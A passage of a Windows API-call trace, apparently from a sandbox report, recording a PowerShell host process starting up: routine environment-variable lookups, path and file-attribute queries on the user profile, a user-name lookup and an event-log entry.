lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.330] CoTaskMemFree (pv=0x2cb130) [0092.332] CoTaskMemAlloc (cb=0x104) returned 0x2e4120 [0092.332] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4120, nSize=0x80 | out: lpBuffer="") returned 0x0 [0092.332] CoTaskMemFree (pv=0x2e4120) [0092.332] CoTaskMemAlloc (cb=0x104) returned 0x2e4120 [0092.332] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4120, nSize=0x80 | out: lpBuffer="") returned 0x0 [0092.332] CoTaskMemFree (pv=0x2e4120) [0092.348] CoTaskMemAlloc (cb=0x104) returned 0x2e4120 [0092.348] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4120, nSize=0x80 | out: lpBuffer="") returned 0x0 [0092.348] CoTaskMemFree (pv=0x2e4120) [0092.349] CoTaskMemAlloc (cb=0x104) returned 0x2e4120 [0092.350] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4120, nSize=0x80 | out: lpBuffer="") returned 0x0 [0092.350] CoTaskMemFree (pv=0x2e4120) [0092.350] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x16d310, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0092.350] SetErrorMode (uMode=0x1) returned 0x1 [0092.350] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x16d570 | out: lpFileInformation=0x16d570*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x81cb0280, ftLastAccessTime.dwHighDateTime=0x1d62524, ftLastWriteTime.dwLowDateTime=0x81cb0280, ftLastWriteTime.dwHighDateTime=0x1d62524, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0092.350] SetErrorMode (uMode=0x1) returned 0x1 [0092.350] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x16d310, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0092.350] SetErrorMode (uMode=0x1) returned 0x1 [0092.350] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x16d570 | out: lpFileInformation=0x16d570*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x81cb0280, ftLastAccessTime.dwHighDateTime=0x1d62524, ftLastWriteTime.dwLowDateTime=0x81cb0280, ftLastWriteTime.dwHighDateTime=0x1d62524, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0092.351] SetErrorMode (uMode=0x1) returned 0x1 [0092.351] CoTaskMemAlloc (cb=0x104) returned 0x2e4120 [0092.351] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4120, nSize=0x80 | out: lpBuffer="") returned 0x0 [0092.351] CoTaskMemFree (pv=0x2e4120) [0092.355] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x16d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0092.355] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d320, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0092.355] SetErrorMode (uMode=0x1) returned 0x1 [0092.356] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d530 | out: lpFileInformation=0x16d530*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0092.356] SetErrorMode (uMode=0x1) returned 0x1 [0092.356] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d320, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0092.356] SetErrorMode (uMode=0x1) returned 0x1 [0092.356] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d530 | out: lpFileInformation=0x16d530*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0092.356] SetErrorMode (uMode=0x1) returned 0x1 [0092.356] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d330, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0092.356] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d220, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0092.356] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x16d320, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0092.357] SetErrorMode (uMode=0x1) returned 0x1 [0092.357] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x16d530 | out: lpFileInformation=0x16d530*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0092.357] SetErrorMode (uMode=0x1) returned 0x1 [0092.357] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x16d320, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0092.357] SetErrorMode (uMode=0x1) returned 0x1 [0092.357] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x16d530 | out: lpFileInformation=0x16d530*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0092.357] SetErrorMode (uMode=0x1) returned 0x1 [0092.357] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x16d330, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0092.357] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x16d220, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0092.357] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x16d320, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0092.357] SetErrorMode (uMode=0x1) returned 0x1 [0092.358] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x16d530 | out: lpFileInformation=0x16d530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0092.358] SetErrorMode (uMode=0x1) returned 0x1 [0092.358] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x16d320, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0092.358] SetErrorMode (uMode=0x1) returned 0x1 [0092.358] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x16d530 | out: lpFileInformation=0x16d530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0092.358] SetErrorMode (uMode=0x1) returned 0x1 [0092.358] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x16d330, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0092.358] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\.", nBufferLength=0x105, lpBuffer=0x16d220, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0092.358] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x16d320, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0092.358] SetErrorMode (uMode=0x1) returned 0x1 [0092.358] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x16d530 | out: lpFileInformation=0x16d530*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x81cb0280, ftLastAccessTime.dwHighDateTime=0x1d62524, ftLastWriteTime.dwLowDateTime=0x81cb0280, ftLastWriteTime.dwHighDateTime=0x1d62524, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0092.358] SetErrorMode (uMode=0x1) returned 0x1 [0092.358] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x16d320, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0092.359] SetErrorMode (uMode=0x1) returned 0x1 [0092.359] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x16d530 | out: lpFileInformation=0x16d530*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x81cb0280, ftLastAccessTime.dwHighDateTime=0x1d62524, ftLastWriteTime.dwLowDateTime=0x81cb0280, ftLastWriteTime.dwHighDateTime=0x1d62524, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0092.359] SetErrorMode (uMode=0x1) returned 0x1 [0092.359] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x16d330, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0092.359] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x16d220, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0092.359] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x16d360, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0092.359] SetErrorMode (uMode=0x1) returned 0x1 [0092.359] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x16d570 | out: lpFileInformation=0x16d570*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0092.359] SetErrorMode (uMode=0x1) returned 0x1 [0092.359] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x16d360, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0092.360] SetErrorMode (uMode=0x1) returned 0x1 [0092.360] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x16d570 | out: lpFileInformation=0x16d570*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0092.360] SetErrorMode (uMode=0x1) returned 0x1 [0092.360] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x16d370, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0092.360] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x16d260, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0092.360] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x16d360, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0092.360] SetErrorMode (uMode=0x1) returned 0x1 [0092.360] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x16d570 | out: lpFileInformation=0x16d570*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0092.360] SetErrorMode (uMode=0x1) returned 0x1 [0092.360] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x16d360, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0092.360] SetErrorMode (uMode=0x1) returned 0x1 [0092.361] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x16d570 | out: lpFileInformation=0x16d570*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0092.361] SetErrorMode (uMode=0x1) returned 0x1 [0092.361] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x16d370, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0092.361] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\.", nBufferLength=0x105, lpBuffer=0x16d260, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0092.361] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x16d360, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0092.361] SetErrorMode (uMode=0x1) returned 0x1 [0092.361] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x16d570 | out: lpFileInformation=0x16d570*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x81cb0280, ftLastAccessTime.dwHighDateTime=0x1d62524, ftLastWriteTime.dwLowDateTime=0x81cb0280, ftLastWriteTime.dwHighDateTime=0x1d62524, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0092.361] SetErrorMode (uMode=0x1) returned 0x1 [0092.361] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x16d360, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0092.361] SetErrorMode (uMode=0x1) returned 0x1 [0092.361] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x16d570 | out: lpFileInformation=0x16d570*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x81cb0280, ftLastAccessTime.dwHighDateTime=0x1d62524, ftLastWriteTime.dwLowDateTime=0x81cb0280, ftLastWriteTime.dwHighDateTime=0x1d62524, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0092.361] SetErrorMode (uMode=0x1) returned 0x1 [0092.361] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x16d370, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0092.362] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x16d260, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0092.363] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x16d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0092.363] SetErrorMode (uMode=0x1) returned 0x1 [0092.363] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x16d830 | out: lpFileInformation=0x16d830*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x81cb0280, ftLastAccessTime.dwHighDateTime=0x1d62524, ftLastWriteTime.dwLowDateTime=0x81cb0280, ftLastWriteTime.dwHighDateTime=0x1d62524, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0092.363] SetErrorMode (uMode=0x1) returned 0x1 [0092.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.477] CoTaskMemAlloc (cb=0x804) returned 0x2742c0 [0092.477] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2742c0, nSize=0x16db98 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16db98) returned 0x1 [0092.477] CoTaskMemFree (pv=0x2742c0) [0092.477] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0092.477] GetUserNameW (in: lpBuffer=0x293930, pcbBuffer=0x16dbd8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16dbd8) returned 1 [0092.478] CoTaskMemFree (pv=0x293930) [0092.480] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3884970*="Available", lpRawData=0x3884700) returned 1 [0092.481] CoTaskMemAlloc (cb=0x104) returned 0x2e4120 [0092.481] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4120, nSize=0x80 | out: lpBuffer="") returned 0x0 [0092.482] CoTaskMemFree (pv=0x2e4120) [0092.483] CoTaskMemAlloc (cb=0x104) returned 0x2e4120 [0092.483] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4120, nSize=0x80 | out: lpBuffer="") returned 0x0 [0092.483] CoTaskMemFree (pv=0x2e4120) [0092.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.492] CoTaskMemAlloc (cb=0x104) returned 0x2e4120 [0092.492] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x2e4120, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0092.492] CoTaskMemFree (pv=0x2e4120) [0092.492] CoTaskMemAlloc (cb=0x104) returned 0x2e4120 [0092.492] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x2e4120, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b [0092.493] CoTaskMemFree (pv=0x2e4120) [0092.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d570, 